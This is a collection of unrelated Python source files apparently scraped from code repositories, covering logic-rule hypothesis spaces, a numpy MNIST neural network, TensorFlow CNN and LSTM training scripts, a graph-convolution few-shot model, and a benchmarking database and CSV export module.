# Add the single-block hypotheses to hypothesis space
hypothesisSpace += [[i] for i in self.unorderedArgs[0:len(self.blockList)]]
# Remove the single-block hypotheses from arguments
args = self.unorderedArgs[len(self.blockList):]
# Use args as arguments for Or(), add to hyp. space
for arg in args:
hypothesisSpace.append(self.Or(*arg))
if uniform:
# Calculate prior distribution of hypothesis space
hypothesisSpacePrior = [1.0/len(self.unorderedArgs) for i in self.unorderedArgs]
return [hypothesisSpace, hypothesisSpacePrior, [''.join(i) for i in self.unorderedArgs]]
def unorderedAnd(self, uniform=True):
"""
Hypothesis Space #1:
Generates a list of hypotheses, including all combinations of
And logic rules.
Param:
uniform - if true, prior for H is uniform, else t.b.d
"""
# Initializes hypothesis space and prior
hypothesisSpace = list()
hypothesisSpacePrior = list()
# Add the single-block hypotheses to hypothesis space
hypothesisSpace += [[i] for i in self.unorderedArgs[0:len(self.blockList)]]
# Remove the single-block hypotheses from arguments
args = self.unorderedArgs[len(self.blockList):]
# Use args as arguments for Or(), add to hyp. space
for arg in args:
hypothesisSpace.append(self.And(*arg))
if uniform:
# Calculate prior distribution of hypothesis space
hypothesisSpacePrior = [1.0/len(self.unorderedArgs) for i in self.unorderedArgs]
return [hypothesisSpace, hypothesisSpacePrior, [''.join(i) for i in self.unorderedArgs]]
def unorderedAndDepth(self, depth, uniform=True):
"""
Hypothesis Space #1:
Generates a list of hypotheses, including all combinations of
And logic rules.
Param:
uniform - if true, prior for H is uniform, else t.b.d
"""
# Initializes hypothesis space and prior
hypothesisSpace = list()
hypothesisSpacePrior = list()
# Add the single-block hypotheses to hypothesis space
hypothesisSpace += [[i] for i in self.unorderedArgs[0:len(self.blockList)]]
# Remove the single-block hypotheses from arguments
args = self.unorderedArgs[len(self.blockList):]
args = [i for i in args if len(i) <= depth]
# Use args as arguments for Or(), add to hyp. space
for arg in args:
hypothesisSpace.append(self.And(*arg))
if uniform:
# Calculate prior distribution of hypothesis space
hypothesisSpacePrior = [1.0/len(hypothesisSpace) for i in hypothesisSpace]
else:
for h in hypothesisSpace:
hypothesisSpacePrior.append(1.0/self.priorHelp(h))
normal = sum(hypothesisSpacePrior)
hypothesisSpacePrior = [i/normal for i in hypothesisSpacePrior]
return [hypothesisSpace, hypothesisSpacePrior, [''.join(i) for i in self.unorderedArgs]]
def unorderedAndOr(self, uniform = True):
"""
Hypothesis Space # 3:
Generates a list of hypotheses, including all combinations of
And and Or logic rules.
Param:
uniform - if ture, prior for H is uniform, else t.b.d.
"""
# Initializes hypothesis space and prior
hypothesisSpace = list()
hypothesisSpacePrior = list()
# Add hypotheses to the hypothesis space
hypothesisSpace += [[i] for i in self.unorderedArgs[0:len(self.blockList)]]
# Remove the single-block hypotheses from arguments so they don't get
# needlessly duplicated.
args = self.unorderedArgs[len(self.blockList):]
# Use args as arguments for And() as well as Or(), add to hypothesis space
for arg in args:
hypothesisSpace.append(self.And(*arg))
hypothesisSpace.append(self.Or(*arg))
if uniform:
# Calculate prior distribution of hypothesis space
hypothesisSpacePrior = [1.0/len(hypothesisSpace) for i in hypothesisSpace]
# hypothesisSpace = all possible And & Or hypotheses
# hypothesisSpacePrior = either uniform, or simplicity biased (tba)
# the last statement makes up the actionSpace, by taking all the combinations
# we made in unorderedArgs and simply taking away all the spaces etc.
return [hypothesisSpace, hypothesisSpacePrior, [''.join(i) for i in self.unorderedArgs]]
def orderedAnd(self, uniform = True):
"""
Hypothesis space #4
Generates a list of ordered hypotheses, including all combinations
of the And logical operator.
"""
# Initializes the hypothesis space and prior
hypothesisSpace, hypothesisSpacePrior = list(), list()
# Add hypotheses to the hypothesis space:
hypothesisSpace += [[i] for i in self.orderedArgs[0:len(self.blockList)]]
# Remove the single-block hypotheses from the list of arguments
args = self.orderedArgs[len(self.blockList):]
# use the args as arguments for the And() function & add to hypothesisSpace
for arg in args:
hypothesisSpace.append(self.And(*arg))
if uniform:
# Calculate prior
hypothesisSpacePrior = [1.0/len(self.orderedArgs) for i in self.orderedArgs]
return [hypothesisSpace, hypothesisSpacePrior, [''.join(i) for i in self.unorderedArgs]]
def orderedAndOr(self, uniform = True):
"""
Hypothesis space # 5:
Generates a lsit of ordered hypotheses, including all combinations of
the And && Or logical operators
"""
# Initializes the hypothesis space & prior
hypothesisSpace, hypothesisSpacePrior = list(), list()
# Add hypotheses to the hypothesis space:
hypothesisSpace += [[i] for i in self.orderedArgs[0:len(self.blockList)]]
# remove the single-block hypotheses from the list of arguments
args = self.orderedArgs[len(self.blockList):]
args2 = self.unorderedArgs[len(self.blockList):]
# use the args as arguments for the And() and Or() functions and add to hyopthesisSpace
for arg in args:
hypothesisSpace.append(self.And(*arg))
for arg in args2:
hypothesisSpace.append(self.Or(*arg))
if uniform:
# calculate prior
hypothesisSpacePrior = [1.0/len(hypothesisSpace) for i in hypothesisSpace]
return [hypothesisSpace, hypothesisSpacePrior, [''.join(i) for i in self.unorderedArgs]]
def Or(self, *args):
"""
Logical Or, e.g. Or('A','B') = ['A','B']
Can handle 2 or more arguments
Param:
*args - May accept any argument, but
for the model, block characters generally used
"""
# Our return list
temp = list()
# Sift through arguments to add to final list
for arg in args:
# If argument is a tuple, convert to list then add
if type(arg) is tuple:
temp.append(list(arg))
# Standard character, add as usual
else:
temp.append(arg)
return temp
# def And(self, *args):
# """
# Logical And, e.g. And('A','B') -> ['AB','BA']
# Can handle 2 or more arguments.
# Param:
# *args - May accept any argument, but
# for the model, block characters generally used.
# """
# args = list(args)
# # Convert arguments to list if not already
# for i in range(len(args)):
# if type(args[i]) is not list:
# args[i] = list([args[i]])
# # Initialize final list
# final = list()
# # Generate all permutations of arguments
# temp = list(itertools.permutations(args))
# # Compute all products within each permutation
# for arg in temp:
# final.append(list([''.join(s) for s in list(itertools.product(*arg))]))
# return [''.join(i) for i in final]
def And(self,*args):
args = list(args)
for i in range(len(args)):
if type(args[i]) is not list:
args[i] = list([args[i]])
return [''.join(s) for s in list(itertools.product(*args))]
def total_len(self, hyp):
total = 0
for h in hyp:
total += len(h)
return total
def max_len(self, hyp):
max_len = 0
for h in hyp:
if max_len < len(h):
max_len = len(h)
return max_len
``` |
{
"source": "joeyginorio/Neural-Network",
"score": 4
} |
#### File: joeyginorio/Neural-Network/NeuralNetwork.py
```python
import numpy as np
import scipy.special
# Generates a neural network of any depth
class NeuralNetwork:
# Initialize the network
def __init__(self, depth, iNodes, hNodes, oNodes, learningRate):
# Set dimensions of network
self.iNodes = iNodes
self.depth = depth
self.hNodes = hNodes
self.oNodes = oNodes
self.learningRate = learningRate
# Initialize weights
# Uses the sampling trick for better intial value
self.w = list()
# Weights for input->hidden
self.w.append(np.random.normal(0.0, pow(self.hNodes, -.5),
(self.hNodes, self.iNodes)))
# Weights for hidden->hidden
for i in range(self.depth-1):
self.w.append(np.random.normal(0.0, pow(self.hNodes,-.5),
(self.hNodes, self.hNodes)))
# Weights for hidden->output
self.w.append(np.random.normal(0.0, pow(self.oNodes, -.5),
(self.oNodes, self.hNodes)))
self.activationFunction = lambda x: scipy.special.expit(x)
self.inverseActivationFunction = lambda x: scipy.special.logit(x)
# Train the network
def train(self, inputs_list, targets_list):
##################### FEED FORWARD #############################
# Initialize input/output/error/weightUpdate lists
self.inputs = list()
self.outputs = list()
self.errors = np.empty([len(self.w),1]).tolist()
self.wUpdate = np.empty([len(self.w),1]).tolist()
# Initial input / target
self.inputs.append(np.array(inputs_list, ndmin=2).T)
self.outputs.append(self.inputs[0])
self.targets = np.array(targets_list, ndmin=2).T
# Calculate input/output for input->hidden
self.inputs.append(np.dot(self.w[0], self.outputs[0]))
self.outputs.append(self.activationFunction(self.inputs[1]))
# Calculate input/output for hidden->hidden
for i in xrange(1, self.depth):
self.inputs.append(np.dot(self.w[i],self.outputs[i]))
self.outputs.append(self.activationFunction(self.inputs[i+1]))
# Calculate input/output for hidden->output
self.inputs.append(np.dot(self.w[-1], self.outputs[-1]))
self.outputs.append(self.activationFunction(self.inputs[-1]))
################## BACK PROPAGATE ##############################
# Calculate initial error (from output layer)
self.errors[-1] = self.targets - self.outputs[-1]
self.wUpdate[-1] = self.learningRate * np.dot(self.errors[-1] * \
self.outputs[-1] * (1 - self.outputs[-1]), self.outputs[-2].T)
self.w[-1] += self.wUpdate[-1]
# Calculate back-propagated error for rest of network
for i in xrange(2, len(self.w) + 1):
# Allows the loop to run even if only one hidden layer present
if i > len(self.w):
break
self.errors[-i] = np.dot(self.w[-(i-1)].T, self.errors[-(i-1)])
self.wUpdate[-i] = self.learningRate * np.dot(self.errors[-i] *
self.outputs[-i] * (1-self.outputs[-i]), self.outputs[-(i+1)].T)
self.w[-i] += self.wUpdate[-i]
# Query the network
def query(self, inputs_list):
# Initialize input/output lists
self.inputs = list()
self.outputs = list()
# Initial input
self.inputs.append(np.array(inputs_list, ndmin=2).T)
self.outputs.append(self.inputs[0])
# Calculate input/output for input->hidden
self.inputs.append(np.dot(self.w[0], self.outputs[0]))
self.outputs.append(self.activationFunction(self.inputs[1]))
# Calculate input/output for hidden->hidden
for i in xrange(1, self.depth):
self.inputs.append(np.dot(self.w[i],self.outputs[i]))
self.outputs.append(self.activationFunction(self.inputs[i+1]))
# Calculate input/output for hidden->output
self.inputs.append(np.dot(self.w[-1], self.outputs[-1]))
self.outputs.append(self.activationFunction(self.inputs[-1]))
return self.outputs[-1]
# Peek into the mind of the network!
def backquery(self, targets_list):
# Convert list to numpy array
self.targets = np.array(targets_list, ndmin=2).T
self.inputs = np.empty([len(self.inputs),1]).tolist()
self.outputs = np.empty([len(self.inputs),1]).tolist()
# Calculate output/input of output layer
self.outputs[-1] = self.targets
self.inputs[-1] = self.inverseActivationFunction(self.targets)
# Calculate output/input for hidden<-output w/rescaling
self.outputs[-2] = np.dot(self.w[-1].T, self.inputs[-1])
self.outputs[-2] -= self.outputs[-2].min()
self.outputs[-2] /= self.outputs[-2].max()
self.outputs[-2] *= .98
self.outputs[-2] += .01
self.inputs[-2] = self.inverseActivationFunction(self.outputs[-2])
# Calculate output/input for hidden<-hidden w/rescaling
for i in xrange(1, self.depth-1):
self.outputs[-(i+2)] = np.dot(self.w[-(i+1)].T, self.inputs[-(i+1)])
self.outputs[-(i+2)] -= self.outputs[-(i+2)].min()
self.outputs[-(i+2)] /= self.outputs[-(i+2)].max()
self.outputs[-(i+2)] *= .98
self.outputs[-(i+2)] += .01
self.inputs[-(i+2)] = self.inverseActivationFunction(self.outputs[-(i+2)])
# Calculate output/input for input<-hidden w/rescaling for both
self.outputs[0] = np.dot(self.w[0].T, self.inputs[1])
self.outputs[0] -= self.outputs[0].min()
self.outputs[0] /= self.outputs[0].max()
self.outputs[0] *= .98
self.outputs[0] += .01
self.inputs[0] = self.inverseActivationFunction(self.outputs[0])
self.inputs[0] -= self.inputs[0].min()
self.inputs[0] /= self.inputs[0].max()
self.inputs[0] *= .98
self.inputs[0] += .01
return self.inputs[0]
# Test Script for MNIST digit classification
# Specify the network parameters
numH = 1
iNodes = 784
hNodes = 200
oNodes = 10
learningRate = .2
epochs = 5
# Instantiate the network
NN = NeuralNetwork(numH, iNodes, hNodes, oNodes, learningRate)
# Load train / test datasets
trainingFile = open("mnist_train.csv", 'r')
trainingData = trainingFile.readlines()
trainingFile.close()
testingFile = open("mnist_test.csv", 'r')
testingData = testingFile.readlines()
testingFile.close()
# Retrain over epochs
for i in range(epochs):
# Train all images in MNIST training set
for image in trainingData:
# Convert csv to vector form
image = image.split(',')
# Hold onto label index
labelIndex = int(image[0])
# Process rest of vector into scaled image pixel array
image = np.array(image[1:], dtype='float64')
image /= 255.0
image *= .99
image += .01
# Generate targets vector
targets = np.zeros(oNodes) + .01
targets[labelIndex] = .99
NN.train(image, targets)
# Keep track of network performance
scores = list()
answers = list()
finalResults = list()
# Test for all images in MNIST test set
for image in testingData:
# Convert csv into vector form
image = image.split(',')
# Hold onto label index / info
correctLabel = int(image[0])
answers.append(correctLabel)
# Scale and shift image
image = np.array(image[1:], dtype='float')
image /= 255.0
image *= .99
image += .01
# Query the network
results = NN.query(image)
label = np.argmax(results)
finalResults.append(label)
if(label == correctLabel):
scores.append(1)
else:
scores.append(0)
scores = np.array(scores)
print "Performance: {}".format(float(scores.sum())/scores.size)
# Notes: Add intermediate results
# Output the hidden layer as well
``` |
{
"source": "joeyguerra/python-starter",
"score": 3
} |
#### File: joeyguerra/python-starter/test_mytest.py
```python
import unittest
# Unittest test
class MyTest(unittest.TestCase):
def test_method1(self):
actual = 1
expected = 1
self.assertEquals(actual, expected)
def test_method2(self):
actual = 1
expected = 2
self.assertNotEquals(actual, expected)
``` |
{
"source": "Joeyhana/TRPN",
"score": 3
} |
#### File: Joeyhana/TRPN/model.py
```python
from torchtools import *
from collections import OrderedDict
import math
#import seaborn as sns
import numpy as np
import matplotlib.pyplot as plt
from torch.nn.parameter import Parameter
class GraphConvolution(nn.Module):
"""
Simple GCN layer, similar to https://arxiv.org/abs/1609.02907
"""
def __init__(self, in_features, out_features, bias=True):
super(GraphConvolution, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.weight = Parameter(torch.FloatTensor(in_features, out_features).to(tt.arg.device))
if bias:
self.bias = Parameter(torch.FloatTensor(out_features).to(tt.arg.device))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self):
stdv = 1. / math.sqrt(self.weight.size(1))
self.weight.data.uniform_(-stdv, stdv)
if self.bias is not None:
self.bias.data.uniform_(-stdv, stdv)
def forward(self, input, adj):
# print('device:', input.device, self.weight.device)
support = torch.mm(input, self.weight)
output = torch.spmm(adj, support)
if self.bias is not None:
return output + self.bias
else:
return output
def norm(self, adj, symmetric=True):
# A = A+I
new_adj = adj + torch.eye(adj.size(0)).to(tt.arg.device)
# 所有节点的度
degree = new_adj.sum(1)
if symmetric:
# degree = degree^-1/2
degree = torch.diag(torch.pow(degree, -0.5))
return degree.mm(new_adj).mm(degree)
else:
# degree=degree^-1
degree = torch.diag(torch.pow(degree, -1))
return degree.mm(new_adj)
def __repr__(self):
return self.__class__.__name__ + ' (' \
+ str(self.in_features) + ' -> ' \
+ str(self.out_features) + ')'
class TRPN(nn.Module):
def __init__(self, n_feat, n_queries, hidden_layers = [640,320,320,160]):
super(TRPN, self).__init__()
#self.layer_last = nn.Sequential(nn.Linear(in_features=512,
# out_features=128, bias=True),
# nn.BatchNorm1d(128))
self.fc_1 = nn.Sequential(nn.Linear(in_features=n_feat * 2, out_features=hidden_layers[0], bias=True),
nn.ReLU(),
nn.Linear(in_features=hidden_layers[0], out_features=hidden_layers[1], bias=True),
nn.ReLU(),
nn.Linear(in_features=hidden_layers[1], out_features=1, bias=True),
nn.Sigmoid())
self.fc_2 = nn.Sequential(nn.Linear(in_features=n_feat * (n_queries + 1), out_features=hidden_layers[2], bias=True),
nn.ReLU(),
nn.Linear(in_features=hidden_layers[2], out_features=hidden_layers[3], bias=True),
nn.ReLU(),
nn.Linear(in_features=hidden_layers[3], out_features=n_queries, bias=True),
nn.Sigmoid())
self.gc = GraphConvolution(n_feat * (n_queries + 1), n_feat * (n_queries + 1))
def forward(self, node_feat, adj):
# node_feat: batch_size(num_tasks) x num_samples x in_features
# adj: batch_size(num_tasks) x num_supports x num_supports [0, 1]
#node_feat = self.layer_last(node_feat.view(-1,512)).view(-1, 30, 128)
num_tasks = node_feat.size(0)
num_samples = node_feat.size(1)
num_supports = adj.size(1)
num_queries = num_samples - num_supports
in_features_2 = node_feat.size(2) * 2
x_i = node_feat.unsqueeze(2).repeat(1, 1, node_feat.size(1), 1)
x_j = torch.transpose(x_i, 1, 2)
x_ij = torch.cat((x_i, x_j), -1)
# batch_size x num_samples x (in_features * (num_queries + 1))
gcn_input_feat = node_feat
for i in range(num_queries):
gcn_input_feat = torch.cat((gcn_input_feat, node_feat[:, num_supports + i, :].unsqueeze(1).repeat(1, num_samples, 1)), -1)
learned_score_list = []
query_score_list = []
for i in range(num_tasks):
# num_samples x num_samples
learned_score = self.fc_1(x_ij[i].contiguous().view(num_samples ** 2, in_features_2)).view(num_samples, num_samples)
learned_adj = learned_score.clone()
ones = torch.ones(learned_adj[:num_supports, :num_supports].size()).to(tt.arg.device)
if tt.arg.num_unlabeled >0:
learned_adj[:num_supports, :num_supports] = torch.where(adj[i] == 1.0, ones ,learned_adj[:num_supports, :num_supports])
learned_adj[:num_supports, :num_supports] = torch.where(adj[i] == 0,-learned_adj[:num_supports, :num_supports],learned_adj[:num_supports, :num_supports])
else:
learned_adj[:num_supports, :num_supports] = torch.where(adj[i] > 0, ones, -learned_adj[:num_supports, :num_supports])
# num_samples x num_queries
query_score = self.fc_2(F.relu(self.gc(gcn_input_feat[i], learned_adj)))
learned_score_list.append(learned_score)
query_score_list.append(query_score)
# query_score_list: batch_size x num_queries x num_samples
# learned_score_list: batch_size x num_samples x num_samples
return torch.stack(query_score_list, 0).transpose(1, 2), torch.stack(learned_score_list, 0)
``` |
{
"source": "joeyhaohao/deep-learning",
"score": 3
} |
#### File: deep-learning/cnn/eval.py
```python
import time
import numpy as np
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
import train
import inference
# Evaluate accuracy of new model every 60 sec
EVAL_INTERVAL = 60
DATA_PATH = "/tmp/mnist_data/"
def evaluate(mnist):
with tf.Graph().as_default() as g:
feature = tf.placeholder(tf.float32, [None,
inference.IMAGE_SIZE,
inference.IMAGE_SIZE,
inference.NUM_CHANNELS], name="feature")
label = tf.placeholder(tf.float32, [None, inference.OUTPUT_SIZE], name="label")
y = inference.inference(feature, False, None)
correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(label, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# variable_averages = tf.train.ExponentialMovingAverage(train.MOVING_AVERAGE_DECAY)
# variable_to_restore = variable_averages.variables_to_restore()
saver = tf.train.Saver()
valid_x = np.reshape(mnist.validation.images,
[mnist.validation.num_examples,
inference.IMAGE_SIZE,
inference.IMAGE_SIZE,
inference.NUM_CHANNELS])
test_x = np.reshape(mnist.test.images,
[mnist.test.num_examples,
inference.IMAGE_SIZE,
inference.IMAGE_SIZE,
inference.NUM_CHANNELS])
while True:
with tf.Session() as sess:
ckpt = tf.train.get_checkpoint_state(train.MODEL_PATH)
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]
valid_acc = sess.run(accuracy,
feed_dict={feature: valid_x,
label: mnist.validation.labels})
test_acc = sess.run(accuracy,
feed_dict={feature: test_x,
label: mnist.test.labels})
print("Valid acc at step {}: {}".format(global_step, valid_acc))
print("Test acc at step {}: {}".format(global_step, test_acc))
else:
print("No checkpoint found.")
return
time.sleep(EVAL_INTERVAL)
def main(_):
mnist = input_data.read_data_sets(DATA_PATH, one_hot=True)
evaluate(mnist)
if __name__=='__main__':
tf.app.run()
```
#### File: deep-learning/fully_connected_nn/inference.py
```python
import tensorflow as tf
INPUT_SIZE = 784
HIDDEN_SIZE = 512
OUTPUT_SIZE = 10
def summaries(var, name):
with tf.name_scope("summaries"):
tf.summary.histogram(name, var)
mean = tf.reduce_mean(var)
tf.summary.scalar('mean/'+name, mean)
stddev = tf.sqrt(tf.reduce_mean(tf.square(var-mean)))
tf.summary.scalar('stddev/'+name, stddev)
def inference(input_tensor, regularizer):
with tf.variable_scope("layer1", reuse=tf.AUTO_REUSE):
weights = tf.get_variable("weights", shape=[INPUT_SIZE, HIDDEN_SIZE],
initializer=tf.truncated_normal_initializer(stddev=0.1))
summaries(weights, 'layer1/weights')
if regularizer!=None:
tf.add_to_collection("losses", regularizer(weights))
biases = tf.get_variable("biases", [HIDDEN_SIZE],
initializer=tf.constant_initializer(0.0))
summaries(weights, 'layer1/biases')
layer1 = tf.nn.relu(tf.matmul(input_tensor, weights) + biases)
summaries(weights, 'layer1/activation')
tf.summary.histogram('layer1/activations', layer1)
with tf.variable_scope("layer2", reuse=tf.AUTO_REUSE):
weights = tf.get_variable("weights", shape=[HIDDEN_SIZE, OUTPUT_SIZE],
initializer=tf.truncated_normal_initializer(stddev=0.1))
if regularizer!=None:
tf.add_to_collection("losses", regularizer(weights))
biases = tf.get_variable("biases", [OUTPUT_SIZE],
initializer=tf.constant_initializer(0.0))
layer2 = tf.matmul(layer1, weights) + biases
return layer2
```
#### File: lstm/poem_generator/train.py
```python
import os
import tensorflow as tf
import model
def run_training(batch_size, hidden_size, time_steps, learning_rate, num_epoch, vocab_size,
poems, generator, encoder, decoder, model_dir, write_mode):
start_token = encoder['s']
with tf.variable_scope("model", reuse=tf.AUTO_REUSE):
input_poem = tf.placeholder(tf.int32, [None, time_steps + 1])
x = input_poem[:, :-1]
target = input_poem[:, 1:]
y = model.build_model(x, batch_size, hidden_size, vocab_size, time_steps)
poem_write = model.write_model(hidden_size, vocab_size, time_steps, write_mode,
None, start_token)
loss = -tf.reduce_sum(y.log_prob(target))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
train_op = optimizer.minimize(loss)
init_op = tf.group(tf.global_variables_initializer(),
tf.local_variables_initializer())
saver = tf.train.Saver(tf.global_variables())
with tf.Session() as sess:
sess.run(init_op)
# checkpoint = tf.train.latest_checkpoint(model_dir)
ckpt = tf.train.get_checkpoint_state(model_dir)
if ckpt:
saver.restore(sess, ckpt.model_checkpoint_path)
n_iter_per_epoch = len(poems) // batch_size
try:
for epoch in range(num_epoch):
for step in range(n_iter_per_epoch):
data = next(generator(poems, batch_size, encoder))
[_, loss_value] = sess.run([train_op, loss],
feed_dict={input_poem: data})
if (step + 1) % 10 == 0:
print("Epoch: {}, batch: {}, average training loss: {:0.5f}".format(
epoch, step, loss_value / batch_size))
sample = sess.run(poem_write)
sample = ''.join([decoder[c] for c in sample])
print("Sample poem:")
for i in range(4):
print(sample[i*12: (i+1)*12])
saver.save(sess, os.path.join(model_dir, "model.ckpt"), global_step=epoch)
except KeyboardInterrupt:
print('Interrupt manually, try saving checkpoint...')
saver.save(sess, os.path.join(model_dir, "model.ckpt"), global_step=epoch)
print('Checkpoint saved.')
``` |
{
"source": "JoeyHendricks/PyBench",
"score": 2
} |
#### File: Benchmarking/_database/collection.py
```python
from .._database.common import CommonDatabaseInteractions
from .._utilities.defaults import default_sqlite_database_name
from .._configuration import options
from sqlalchemy import select, func
from tempfile import gettempdir
class Create(CommonDatabaseInteractions):
def __init__(self):
super(Create, self).__init__()
def insert_performance_statistics(self, url: str, payload: list, tcn: str) -> None:
"""
:param url:
:param payload:
:param tcn:
:return:
"""
return self.bulk_insert(
connection_url=url,
table=self.c_profiler_statistics_data_model(test_case_name=tcn),
payload=payload
)
def insert_boundary_verification_results(self, url: str, payload: list, tcn: str) -> None:
"""
:param url:
:param payload:
:param tcn:
:return:
"""
return self.bulk_insert(
connection_url=url,
table=self.boundary_test_report_model(test_case_name=tcn),
payload=payload
)
class Read(CommonDatabaseInteractions):
def __init__(self):
super(Read, self).__init__()
def select_benchmark_profiled_method_response_times(self, url: str, tcn: str, test_id: float) -> list:
"""
:param url:
:param tcn:
:param test_id:
:return:
"""
table = self.c_profiler_statistics_data_model(test_case_name=tcn)
return [
float(row.total_response_time) for row in self.execute_sql_statement(
connection_url=url,
query=select(
[
table.c.sample_id.distinct(),
table.c.total_response_time
]
).where(table.c.test_id == test_id)
)
]
def select_benchmark_profiled_method_cumulative_latency(self, url: str, tcn: str, test_id: float) -> list:
"""
:param url:
:param tcn:
:param test_id:
:return:
"""
table = self.c_profiler_statistics_data_model(test_case_name=tcn)
return [
float(row.cumulative_time) for row in self.execute_sql_statement(
connection_url=url,
query=select(
[
table.c.sample_id.distinct(),
table.c.cumulative_time
]
).where(table.c.test_id == test_id)
)
]
def select_benchmarks_with_statistics(self, url: str, tcn: str, number=options.set_max_saved_tests) -> list:
"""
:param url:
:param tcn:
:param number:
:return:
"""
table = self.c_profiler_statistics_data_model(test_case_name=tcn)
return [
float(row.test_id) for row in self.execute_sql_statement(
connection_url=url,
query=select([table.c.test_id]).distinct().limit(number).order_by(table.c.test_id.desc())
)
]
def select_validated_benchmarks(self, url: str, tcn: str, number=options.set_max_saved_tests) -> list:
"""
:param url:
:param tcn:
:param number:
:return:
"""
table = self.boundary_test_report_model(test_case_name=tcn)
return [
str(row.test_id) for row in self.execute_sql_statement(
connection_url=url,
query=select([table.c.test_id]).distinct().limit(number)
)
]
def select_count_of_all_available_benchmarks(self, url: str, tcn: str) -> int:
"""
:param url:
:param tcn:
:return:
"""
table = self.c_profiler_statistics_data_model(test_case_name=tcn)
return int(
[
row[0] for row in self.execute_sql_statement(
connection_url=url,
query=select([func.count(table.c.test_id.distinct())])
)
]
[0]
)
def select_benchmark_call_stack_by_sample_id(self, url: str, tcn: str, sample_id: str) -> list:
"""
:param url:
:param tcn:
:param sample_id:
:return:
"""
table = self.c_profiler_statistics_data_model(test_case_name=tcn)
return [
{
"uuid": row.uuid,
"test_id": row.test_id,
"test_case_name": row.test_case_name,
"sample_id": row.sample_id,
"name_of_method_under_test": row.name_of_method_under_test,
"epoch_timestamp": int(row.epoch_timestamp),
"human_timestamp": row.human_timestamp,
"child_path": row.child_path,
"child_line_number": row.child_line_number,
"child_function_name": row.child_function_name,
"parent_path": row.parent_path,
"parent_line_number": row.parent_line_number,
"parent_function_name": row.parent_function_name,
"number_of_calls": row.number_of_calls,
"total_time": float(row.total_time),
"cumulative_time": float(row.cumulative_time),
"total_response_time": float(row.total_response_time)
}
for row in self.execute_sql_statement(
connection_url=url,
query=table.select().where(
table.c.sample_id == str(sample_id)
).order_by(
table.c.cumulative_time.desc()
)
)
]
def select_benchmark_call_stack_by_test_id(self, url: str, tcn: str, test_id: float) -> list:
"""
:param url:
:param tcn:
:param test_id:
:return:
"""
table = self.c_profiler_statistics_data_model(test_case_name=tcn)
return [
{
"uuid": row.uuid,
"test_id": row.test_id,
"test_case_name": row.test_case_name,
"sample_id": row.sample_id,
"name_of_method_under_test": row.name_of_method_under_test,
"epoch_timestamp": int(row.epoch_timestamp),
"human_timestamp": row.human_timestamp,
"child_path": row.child_path,
"child_line_number": row.child_line_number,
"child_function_name": row.child_function_name,
"parent_path": row.parent_path,
"parent_line_number": row.parent_line_number,
"parent_function_name": row.parent_function_name,
"number_of_calls": row.number_of_calls,
"total_time": float(row.total_time),
"cumulative_time": float(row.cumulative_time),
"total_response_time": float(row.total_response_time)
}
for row in self.execute_sql_statement(
connection_url=url,
query=table.select().where(
table.c.test_id == str(test_id)
).order_by(
table.c.cumulative_time.desc()
)
)
]
def select_all_sample_ids_in_benchmark_by_test_id(self, url: str, tcn: str, test_id: float) -> list:
"""
:param url:
:param tcn:
:param test_id:
:return:
"""
table = self.c_profiler_statistics_data_model(test_case_name=tcn)
return [
str(row.sample_id) for row in self.execute_sql_statement(
connection_url=url,
query=select(
[
table.c.sample_id
]
).where(
table.c.test_id == test_id
).distinct()
)
]
class Delete(CommonDatabaseInteractions):
def __init__(self):
super(Delete, self).__init__()
def delete_performance_statistics_that_match_test_id(self, url: str, tcn: str, test_id: float) -> None:
"""
:param url:
:param tcn:
:param test_id:
:return:
"""
table = self.c_profiler_statistics_data_model(test_case_name=tcn)
self.execute_sql_statement(
connection_url=url,
query=table.delete().where(table.c.test_id == str(test_id))
)
class Crud(Create, Read, Delete):
def __init__(self):
super(Crud, self).__init__()
@staticmethod
def _create_default_db_url():
"""
:return:
"""
temp_directory = gettempdir()
separator = "\\" if '\\' in gettempdir() else "/"
return "sqlite:///" + temp_directory + separator + default_sqlite_database_name + ".db"
def _enforce_data_retention_policy(self, url: str, tcn: str) -> None:
"""
:param url:
:param tcn:
:return:
"""
current_number_of_test_ids = self.select_count_of_all_available_benchmarks(url, tcn)
maximum_number_of_test_ids = options.set_max_saved_tests
if current_number_of_test_ids > maximum_number_of_test_ids and \
options.enable_auto_clean_up_old_test_results is True:
oldest_test_ids = self.select_benchmarks_with_statistics(
url=url,
tcn=tcn,
number=options.set_max_saved_tests - 1
)
for test_id in oldest_test_ids:
self.delete_performance_statistics_that_match_test_id(
url=url,
tcn=tcn,
test_id=test_id
)
def _verify_and_create_relevant_tables_in_database(self, url: str, tcn: str) -> None:
"""
:param url:
:param tcn:
:return:
"""
# Models that need to be available in the _database
models = [
self.c_profiler_statistics_data_model(test_case_name=tcn),
self.boundary_test_report_model(test_case_name=tcn)
]
for table_model in models:
# verify if relevant table exists
if self.check_if_table_exists(connection_url=url, table_name=str(table_model.name)):
continue
# table does not exist creating it in _database
else:
self.spawn_table(
connection_url=url,
model=table_model
)
```
#### File: Benchmarking/statistical/result_formats.py
```python
from Benchmarking._database.collection import Crud
from Benchmarking._utilities.exceptions import UnableToExportVisualization
from datetime import datetime
import pandas as pd
import os
class CsvFile(Crud):
def __init__(self, test_case_name: str, test_id: str, database_connection_url=None, delimiter=","):
"""
Will build up the object, when no test id is given and when test case name is default.
It will take the last known test id.
:param test_case_name: The name of the test case
:param delimiter: The delimiter of the csv file
:param database_connection_url: the connection url to the _database
:param test_id: The test id within the test case
"""
super(CsvFile, self).__init__()
self.test_case_name = test_case_name
self._url = self._create_default_db_url() if database_connection_url is None else database_connection_url
self.delimiter = delimiter
self.test_id = test_id
self.list_of_samples = self.select_all_sample_ids_in_benchmark_by_test_id(
url=self._url,
tcn=test_case_name,
test_id=test_id
)
def export(self, path):
"""
Will export the csv file to a directory on the disk.
:param path: The path on disk where the file needs to be written.
Example: C:\\temp\\
"""
if os.path.isdir(path):
content = []
for sample_id in self.list_of_samples:
stack = self.select_benchmark_call_stack_by_sample_id(
url=self._url,
tcn=self.test_case_name,
sample_id=sample_id
)
for line in stack:
content.append(line)
pd.DataFrame(content).to_csv(
path_or_buf=f"{path}raw_export_of_{self.test_id}_{str(datetime.now().timestamp())}.csv",
sep=self.delimiter,
